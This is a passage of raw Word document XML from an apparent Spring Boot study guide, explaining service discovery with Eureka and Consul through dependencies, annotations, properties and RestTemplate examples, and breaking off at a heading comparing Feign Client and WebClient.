          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Eureka helps ensure that services remain discoverable even when one or more instances are down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057E5A0F" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965"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Steps to Use Eureka in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B519783"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Add Dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642E60EB" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965"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Add the spring-cloud-starter-netflix-eureka-server dependency to create a Eureka Server and the spring-cloud-starter-netflix-eureka-client dependency for services to act as Eureka clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6248F986"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lt;!-- Eureka Server Dependency --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249987F0"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lt;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3100B823"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lt;groupId&gt;org.springframework.cloud&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A4E82A"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lt;artifactId&gt;spring-cloud-starter-netflix-eureka-server&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686B57BD"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lt;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7911EE9C" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965" w:rsidP="008B3EF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FFBC7AA"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lastRenderedPageBreak/>
        <w:t>&lt;!-- Eureka Client Dependency --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39279B4D"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lt;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7DAAF2"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lt;groupId&gt;org.springframework.cloud&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5313D4D0"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lt;artifactId&gt;spring-cloud-starter-netflix-eureka-client&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD813AB"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lt;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E775460"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Configure Eureka Server</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ECA4C5" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965"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In your </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Eureka server</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> application, enable the Eureka Server with the @EnableEurekaServer annotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B79CE65"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pringBootApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEFAE57"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EnableEurekaServer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48001B8B"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public class EurekaServerApplication {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472D7877"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36734652"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SpringApplication.run(EurekaServerApplication.class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5D9080"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437D811A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CE8D00" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965"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Add the following properties to the application.properties or application.yml to configure the Eureka server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F040893"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Eureka Server configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C9C57E"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erver.port=8761</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAA67AA"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eureka.client.registerWithEureka=false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6757A605"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eureka.client.fetchRegistry=false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2888EFAD"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Configure Eureka Client</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285F7BDE" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965"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In the </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>microservices</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that will register with Eureka, enable the Eureka client using the @EnableEurekaClient annotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721FBA14"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pringBootApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46328794"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EnableEurekaClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B880B6A"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public class MyMicroserviceApplication {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2AA265"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A4E211"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SpringApplication.run(MyMicroserviceApplication.class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B819D2A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067718D2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FFEB7C" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965"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Add the following properties to the application.properties or application.yml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F9BA8D"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pring.application.name=my-microservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1476B081"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eureka.client.serviceUrl.defaultZone=http://localhost:8761/eureka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285E1351"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Discovery and Communication</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C17C4B8" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965"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To make a service communicate with other services, use @LoadBalanced RestTemplate or Spring Cloud's Feign client for automatic service discovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E2ACD1"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RestController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710CD64B"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public class MyController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1485EB91" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965" w:rsidP="008B3EF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70AAD7F0"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652B1037"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LoadBalanced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4019FBE7"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private RestTemplate restTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE1924D" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965" w:rsidP="008B3EF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BB67574"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RequestMapping("/callOtherService")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C4C90B"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public String callOtherService() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65618608"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return restTemplate.getForObject("http://other-microservice/endpoint", String.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695FD558"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C887526"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A030706"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Run and Verify</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21315151" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965"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Start the </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Eureka server</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then start the </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>microservices</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The microservices will automatically register with Eureka, and you can access the Eureka dashboard at http://localhost:8761 to see all registered services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C09459F" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965"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2. Consul</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC0E39E"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Consul is a tool for service discovery, health checking, and key-value storage. It is more versatile than Eureka and can work in both cloud and on-premises environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E8EBCF" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965"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Key Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AB1BA6"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Service Discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Services register with Consul, and other services can discover them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5072AA"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Health Checks</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Consul performs health checks on services to ensure that only healthy services are used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524BC8E9"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lastRenderedPageBreak/>
        <w:t>KV Storage</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Consul provides a key-value store that can be used for configuration management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406774BA"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Multi-Region</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Consul supports multi-region service discovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF5D47E" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965"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Steps to Use Consul in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E5C636"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Add Dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F1B054" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965"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To integrate Consul into your Spring Boot application, add the Spring Cloud Consul starter dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18064E87"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lt;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FF3F03"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lt;groupId&gt;org.springframework.cloud&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F212D7F"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lt;artifactId&gt;spring-cloud-starter-consul-discovery&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DB2361"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lt;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE8E33B"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Configure Consul Server</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4462219B" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965"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First, ensure that you have a running Consul server (you can run Consul locally or in the cloud).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B0029E" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965"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Add the following configuration in your application.properties or application.yml file to set up Consul:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12610992"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Consul configuration for the microservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB8D2EC"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pring.application.name=my-microservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60807A01"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pring.cloud.consul.host=localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD56323"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pring.cloud.consul.port=8500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04490957"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Enable Consul Discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F7F6FF" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965"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In your </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>microservices</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, enable Consul by adding the @EnableDiscoveryClient annotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CB4471"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pringBootApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680D788B"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EnableDiscoveryClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D65B76"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public class MyMicroserviceApplication {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257FBE72"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B9E991"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SpringApplication.run(MyMicroserviceApplication.class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67422475"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7D92F7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7BEE3D"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Service Registration and Discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106F7234" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965"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When you run the microservice, it will automatically register with Consul. You can query Consul to discover the services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7CF8C7" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965"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Use RestTemplate or FeignClient to call other services using Consul's service discovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B60B380"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RestController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D2FABD"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public class MyController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E9D1D8" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965" w:rsidP="008B3EF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C24133F"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F03588B"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private DiscoveryClient discoveryClient;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E687B54" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965" w:rsidP="008B3EF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59500D25"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RequestMapping("/callOtherService")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F153727"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public String callOtherService() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF1D6E5"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List&lt;ServiceInstance&gt; instances = discoveryClient.getInstances("other-microservice");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CDCF42"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URI uri = instances.get(0).getUri();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D94D612"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return new RestTemplate().getForObject(uri, String.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E521C4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4D4300"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75105F4B"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Health Check</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1024A9AC" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965"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Add health checks to ensure that only healthy services are registered with Consul. This can be configured as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698DF4D6"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pring.cloud.consul.discovery.health-check-enabled=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F6AF48"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pring.cloud.consul.discovery.health-check-interval=30s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AF0218"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pring.cloud.consul.discovery.health-check-http-path=/actuator/health</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF0419D"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Run and Verify</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B11F747" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965"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Run the </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consul server</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and your microservices. You can access the Consul dashboard at http://localhost:8500 to verify the services and their health.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B48576D" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014EDB60"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Eureka</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A REST-based service registry by Netflix for service discovery and health checking. It is often used in Spring Cloud applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49429F22"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Consul</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A tool for service discovery, health checking, and key-value storage. It is more feature-rich than Eureka and can be used for both service discovery and configuration management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDFAA1B" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965"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lastRenderedPageBreak/>
        <w:t>Both Eureka and Consul allow microservices to register and discover other services in a dynamic environment. The choice between Eureka and Consul depends on your requirements and whether you need a more feature-rich solution (Consul) or a simpler, Netflix-supported solution (Eureka).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9FAF85" w14:textId="6FE6A8C5" w:rsidR="00115965" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0011596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0BEB9B2">
          <v:rect id="_x0000_i2795" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC8A9D6" w14:textId="7E2D4628" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="009C51A5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="678" w:name="_Toc196308158"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Feign Client vs WebClient: Which one to use and why</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="678"/>
    </w:p>
    <w:p w14:paraId="36CB5995" w14:textId="4D781167" w:rsidR="00FF6B93" w:rsidRPr="008B3EF9" w:rsidRDefault="00FF6B93" w:rsidP="008B3EF9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
